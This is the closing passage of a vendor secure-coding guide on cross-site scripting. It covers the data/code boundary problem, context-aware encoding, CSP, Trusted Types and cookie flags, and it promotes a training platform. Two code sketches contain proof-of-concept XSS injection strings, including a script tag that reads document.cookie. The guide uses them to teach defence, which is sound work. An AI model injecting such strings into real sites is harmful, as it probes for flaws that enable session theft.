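// that carry SameSite cookies, which is why cookie flags alone cannot
// stop XSS, and output encoding alone cannot stop CSRF.
```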
Scanners Find XSS. Developers Stop Writing It.
A SAST tool that flags an unsafe innerHTML assignment in CI is better than discovering the vulnerability six months later in a bug bounty report — but neither is as good as a developer who would never have written the assignment in the first place. SecureCodingHub builds the context-aware encoding, framework-defaults, and CSP-aware fluency that turns cross-site scripting from a recurring scanner finding into something developers catch themselves at code-review time. If your team is tired of every pentest producing another reflected XSS, stored XSS, or DOM-XSS report, we'd be glad to show you how our program changes the input side of that pipeline.
See the Platform
Closing — XSS Is a Developer Skill, Not a Tooling Problem
The XSS variants in this guide — reflected, stored, DOM, mutation, blind, self — appear superficially different. The injection vectors differ, the payloads differ, the tooling that detects each differs. The underlying pattern is identical: untrusted data is concatenated into HTML or JavaScript, the browser parses the combined output as a structured language, and because the boundary between data and code is encoded in the string's contents rather than in a separate channel, the attacker controls a portion of the contents and uses that control to redraw the boundary in a way the developer did not intend.
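A two-line sketch makes the boundary problem concrete (the variable names are ours):

```javascript
// The developer's mental model: userName stays inside the quotes.
const userName = '"><script>alert(document.cookie)</script>';
const html = '<input value="' + userName + '">';
// The attacker's leading "> closes the attribute and the tag;
// everything after it is parsed as live markup. The boundary moved
// because it was encoded in the string's contents rather than
// carried in a separate channel.
```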
The mitigation is identical too. Provide a separate channel. Use the context's encoding mechanism. Apply the framework's safe-by-default rendering. Reach for sanitization (DOMPurify) only when rich-text rendering is genuinely required, and reach for the framework escape hatch only with sanitized input and a code-review justification. Layer CSP with strict directives so a successful injection becomes a blocked policy event rather than a session compromise. Adopt Trusted Types in new code. Mark session cookies HttpOnly, Secure, SameSite. Apply the discipline at every boundary where untrusted input flows toward a rendering surface.
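The "use the context's encoding mechanism" step, sketched for the HTML-body context (a hand-rolled illustration of the boundary move; real code should lean on the framework's auto-escaping rather than a bespoke encoder):

```javascript
// Minimal HTML-body-context encoder: the five characters that can
// change the parser's interpretation become inert entities.
function encodeForHtml(untrusted) {
  return String(untrusted)
    .replace(/&/g, "&amp;") // must run first, or it re-encodes entities
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

encodeForHtml("<img src=x onerror=alert(1)>");
// -> "&lt;img src=x onerror=alert(1)&gt;" : rendered as text, never an element
```

Each context needs its own rules: attribute values, URLs, and JavaScript strings all encode differently, which is exactly why context-aware framework defaults beat any single hand-written helper.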
Cross-site scripting is ranked under A03 not because it has been solved — the bug bounty data in 2026 says decisively otherwise — but because the prevention has been a known engineering discipline for two decades. The teams that have largely closed their XSS surface share a small set of practices: framework defaults that escape by construction, maintained sanitization libraries, CSP enforced in production, Trusted Types adopted in new code, code review with an XSS-aware checklist, and SAST/DAST/IAST layered to catch what review misses. None of those practices is exotic; the institutional commitment to apply them consistently is. That fluency is what secure-coding training is for, and it is the difference between a program that detects XSS in CI and a program that no longer ships XSS in the first place.